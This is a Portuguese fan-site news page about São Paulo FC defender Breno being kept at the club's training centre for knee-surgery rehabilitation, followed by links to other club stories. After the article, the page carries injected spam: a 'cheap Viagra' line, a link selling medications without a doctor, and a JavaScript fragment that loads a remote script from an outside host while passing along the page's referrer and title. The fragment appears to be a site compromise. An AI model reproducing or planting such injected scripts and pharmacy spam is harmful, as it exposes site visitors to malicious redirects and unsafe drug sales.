Destaque Noticia

Zagueiro precisará de ‘internação’ no CT do São Paulo após cirurgia

Nesta terça-feira, o São Paulo dará início a mais uma etapa do processo de reinserção de Breno no mundo do futebol. Após 19 dias de uma cirurgia no joelho direito, o zagueiro é esperado no CT da Barra Funda para retomar os trabalhos fisioterápicos no Reffis e deve ficar até uma semana internado no local para minimizar os riscos de efeitos colaterais da operação.

Havia uma pequena chance de o beque voltar ao CT ainda na última segunda-feira, mas o retorno dependia de uma liberação do cirurgião René Abdalla, responsável pela intervenção realizada no último dia 12. Já a decisão de manter Breno praticamente internado deve-se ao fato de que o atleta mora em Mairiporã, cidade a cerca de 42 quilômetros da capital.

O deslocamento diário de mais de 45 minutos poderia atrapalhar o processo de recuperação, já que será necessário longo repouso para o joelho de Breno desinchar após as sessões de fisioterapia. A cautela é maior neste caso devido ao histórico do defensor, que já havia passado por artroscopia no local e precisou reconstruir parte do ligamento cruzado.

A dificuldade do zagueiro de ganhar força nos joelhos vem de longe. Na Alemanha, onde atuou pelo Bayern de Munique, sofria com o problema. Os três anos na prisão, com exercícios nada adequados para um atleta profissional, só acentuaram a fragilidade física, que o impediu de emplacar sequências de jogos no São Paulo após o retorno em 2015.


Foram oito partidas desde a volta, atrapalhada também por lesões musculares. Agora, o prazo de recuperação é de sete meses, o que deve deixar o retorno aos gramados somente para a próxima temporada. No Reffis, ele terá a companhia do zagueiro Luiz Eduardo, os laterais Caramelo e Carlinhos, os volantes Wellington e Hudson, o meia Michel Bastos e o atacante Wilder.

Fonte: lancenet

Buy cheap Viagra online pills store

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; purchase a at an easy rate medications without a doctor – http://vietietcynthia1402.mhs.narotama.ac.id/2016/11/30/purchase-a-at-an-easy-rate-medications-without-a-doctor/

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

cinco × quatro =

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.

Destaque Noticia

Mais em Destaque Noticia

Apesar de empate frustrante, São Paulo atinge 12 jogos de invencibilidade e está perto de 3a maior marca em Brasileiros desde 2006

saopauloadmin23 de novembro de 2020

Ceni pede ao juiz para jogo acabar: “Meu time sem chance”

saopauloadmin19 de novembro de 2020

Vai ter festa no Morumbi! Quarta-feira às 19h00, recepção do ônibus tricolor

saopauloadmin16 de novembro de 2020

Rodrigo Nestor comemora estreia no São Paulo: ‘Sonhava desde criança’

saopauloadmin15 de novembro de 2020

Brenner foi aposta de Ceni no São Paulo aos 17 anos; hoje é carrasco

saopauloadmin12 de novembro de 2020

Diniz: O Flamengo poderia ter aproveitado, mas não aproveitaram as chances de erros nossos

saopauloadmin12 de novembro de 2020

“Não tem nada de kamikaze. Treinar o que a gente treina para poder sair jogando, é muito treino” afirma Diniz

saopauloadmin12 de novembro de 2020

Atacante desperta interesse de Ajax, PSG, Milan, Arsenal, Juventus e Lazio

saopauloadmin11 de novembro de 2020

Veja a repercussão da possível volta de Luis Fabiano

saopauloadmin9 de novembro de 2020